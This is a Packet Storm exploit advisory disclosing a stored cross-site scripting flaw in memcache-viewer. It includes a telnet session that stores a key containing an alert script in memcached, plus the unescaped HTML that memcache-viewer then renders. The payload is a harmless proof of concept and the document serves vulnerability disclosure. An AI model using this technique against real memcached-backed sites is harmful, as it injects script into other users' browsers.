memcache-viewer Cross Site Scripting

2017-02-25T00:00:00
ID PACKETSTORM:141304
Type packetstorm
Reporter HaHwul
Modified 2017-02-25T00:00:00

Description

                                        
                                            `# Exploit Title: memcache-viewer - Stored XSS  
# Date: 2017-02-24  
# Exploit Author: HaHwul  
# Exploit Author Blog: www.hahwul.com  
# Vendor Homepage: https://github.com/chrisjameskirkham/memcache-viewer  
# Software Link: https://github.com/chrisjameskirkham/memcache-viewer/archive/master.zip  
# Version: Latest commit  
# Tested on: Debian [wheezy]  
  
### Vulnerability   
This program does not filter filtering on the special character when expressing the data from memcached on the web.  
When XSS attacks and HTML code are inserted in the memcached, user who accesses the page will run the XSS code.  
  
### Example Attack code  
1. Send Payload(XSS Code) after Connecting to memcached server.  
#> telnet 127.0.0.1 11211  
Trying 127.0.0.1...  
Connected to 127.0.0.1.  
Escape character is '^]'.  
  
add hacked<script>alert(45)</script> 0 900 2  
45  
STORED  
  
2. Insert data through memcached related 3rd party application.  
  
### Result  
Access index.php after memcache-viewer login  
DOM Area in index.php  
<td class="key">hacked<script>alert(45)</script></td><td class="slab">2</td><td class="size">2</td>  
`